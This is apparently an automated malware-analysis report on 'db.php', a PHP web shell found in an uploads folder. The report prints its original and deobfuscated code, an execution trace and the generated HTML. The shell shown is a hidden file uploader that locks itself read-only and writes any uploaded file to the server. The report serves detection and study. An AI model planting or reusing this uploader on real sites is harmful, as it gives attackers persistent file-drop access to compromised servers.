PHP Malware Analysis

db.php

md5: f6f57f247ab3815111c0762ea07f0b76

Jump to:

Screenshot


Attributes

Environment

Files

Input


Deobfuscated PHP code

<?php

error_reporting(0);
chmod(basename($_SERVER["PHP_SELF"]), 0444);
echo "#0x2525";
if (isset($_GET["u"])) {
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
    echo "<input type=\"file\" name=\"file\" size=\"30\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
    if ($_POST['_upl'] == "Upload") {
        if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
            echo "S";
        } else {
            echo "F";
        }
    }
}

Execution traces

data/traces/f6f57f247ab3815111c0762ea07f0b76_trace-1676244974.4655.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:36:40.363366]
1	0	1	0.000150	393464
1	3	0	0.000213	396864	{main}	1		/var/www/html/uploads/db.php	0	0
2	4	0	0.000229	396864	error_reporting	0		/var/www/html/uploads/db.php	1	1	0
2	4	1	0.000244	396904
2	4	R			22527
2	5	0	0.000258	396864	basename	0		/var/www/html/uploads/db.php	1	1	'/uploads/db.php'
2	5	1	0.000273	396928
2	5	R			'db.php'
2	6	0	0.000286	396896	chmod	0		/var/www/html/uploads/db.php	1	2	'db.php'	292
2	6	1	0.000308	396968
2	6	R			FALSE
1	3	1	0.000323	396864
			0.000348	314200
TRACE END   [2023-02-12 21:36:40.363595]


Generated HTML code

<html><head></head><body>#0x2525</body></html>

Original PHP code

<?php error_reporting(0);chmod(basename($_SERVER["PHP_SELF"]), 0444);echo("#0x2525");if(isset($_GET["u"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'S';}else{echo'F';}};};